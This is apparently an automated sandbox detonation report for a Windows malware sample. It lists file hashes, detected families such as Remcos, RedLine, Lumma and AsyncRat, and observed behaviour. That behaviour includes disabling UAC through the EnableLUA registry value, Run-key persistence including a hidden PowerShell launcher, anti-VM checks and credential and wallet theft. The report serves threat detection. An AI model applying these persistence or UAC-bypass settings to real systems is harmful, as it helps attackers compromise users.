| SHA1 | 58cf7bfcec81faf744682f9479b905feed8e6e68 |
| SHA256 | b63a0e5f93b26ad0eeb9efba66691f3b7e7f51e93a2f0098bde43833f7a24cc2 |
| SHA512 | 324507084bd56f7102459efe7b3c2d2560f4e89ed03ec4a38539ebb71bccdf1def7bc961c259f9b02f4b2be0d5e095136c9efcd5fc3108af3dc61d24970d6121 |
C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe
| MD5 | 7fa5c660d124162c405984d14042506f |
| SHA1 | 69f0dff06ff1911b97a2a0aa4ca9046b722c6b2f |
| SHA256 | fd3edfaff77dd969e3e0d086495e4c742d00e111df9f935ed61dfba8392584b2 |
| SHA512 | d50848adbfe75f509414acc97096dad191ae4cef54752bdddcb227ffc0f59bfd2770561e7b3c2a14f4a1423215f05847206ad5c242c7fd5b0655edf513b22f6c |
C:\Users\Admin\AppData\Local\Temp\Files\nano.exe
| MD5 | 1873f27a43f63c02800d6c80014c0235 |
| SHA1 | 3441bba24453db09fb56e02a9d56cdf775886f07 |
| SHA256 | 4bfcba248d79dfd6c2cba52d7c9ee18842f007bfa0e3ba99ababacb4794e8c6e |
| SHA512 | 9f2b663afc1cc3dbc8eba3278f61ffb41c19e42f94ee4c8a60eff83c8846b81d34e4ff869b643434a8ad5657c46bd06a712f0598062b62802ba6f0ee6f4fb8f2 |
C:\Users\Admin\AppData\Local\Temp\gsA008.tmp
| MD5 | e667dc95fc4777dfe2922456ccab51e8 |
| SHA1 | 63677076ce04a2c46125b2b851a6754aa71de833 |
| SHA256 | 2f15f2ccdc2f8e6e2f5a2969e97755590f0bea72f03d60a59af8f9dd0284d15f |
| SHA512 | c559c48058db84b1fb0216a0b176d1ef774e47558f32e0219ef12f48e787dde1367074c235d855b20e5934553ba023dc3b18764b2a7bef11d72891d2ed9cadef |
C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe
| MD5 | 96e4917ea5d59eca7dd21ad7e7a03d07 |
| SHA1 | 28c721effb773fdd5cb2146457c10b081a9a4047 |
| SHA256 | cab6c398667a4645b9ac20c9748f194554a76706047f124297a76296e3e7a957 |
| SHA512 | 3414450d1a200ffdcc6e3cb477a0a11049e5e86e8d15ae5b8ed3740a52a0226774333492279092134364460b565a25a7967b987f2304355ecfd5825f86e61687 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 529d9c6f0b37c0ccee526d0309114214 |
| SHA1 | b447424e051c61c100c417ba61daf4299cf73aa5 |
| SHA256 | d19a79cfe5a4ddcde75c417bb656832f443f32a5697c0c2062ef8d02c7795c92 |
| SHA512 | bcb642a174cc14ad89dbca3d00e54f6244e0b9bebd8d141c0973aa21ce7683372815bc60a5c554726e55b1ec1a175163226be3199a66a81b5c16f7b570f1c26e |
C:\Windows\System32\DriverStore\FileRepository\volsnap.inf_amd64_neutral_7499a4fac85b39fc\volsnap.PNF
| MD5 | 5e961b1e105c3b3e61e882a553bf5355 |
| SHA1 | a5410576b80da1982c64fd9bb81b85f6bc7cd12d |
| SHA256 | 1b68210cf77bbf95273c182120e0e38bc6750b361a5c2725319afb753dcfc0d1 |
| SHA512 | 943d43bb77968c9d1df98076ec4a344c01596b2ae7771ce37dd10389ff96eadca91412106f404da5b54fb345d6e0e845259c8cec4537ff4d23c46a5a4e8d756a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-14 20:23
Reported
2024-12-15 01:12
Platform
win7-20240903-es
Max time kernel
1197s
Max time network
1200s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Lumma Stealer, LummaC
Lumma family
Merlin
Merlin family
Merlin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\AppData\Local\Temp\a\x.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\AppData\Local\Temp\a\x.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\D0C04B6E70323196934881\\D0C04B6E70323196934881.exe" | C:\Users\Admin\AppData\Local\Temp\a\dropper.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\AppData\Local\Temp\a\Out2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\D0C04B6E70323196934881\\D0C04B6E70323196934881.exe" | C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\VmManagedSetup.exe'\"" | C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\D0C04B6E70323196934881\\D0C04B6E70323196934881.exe" | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\HardDiskSentinea = "C:\\Users\\Admin\\Favorites\\HardDiskSentine\\redist\\HardDiskSentinelBin.exe" | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
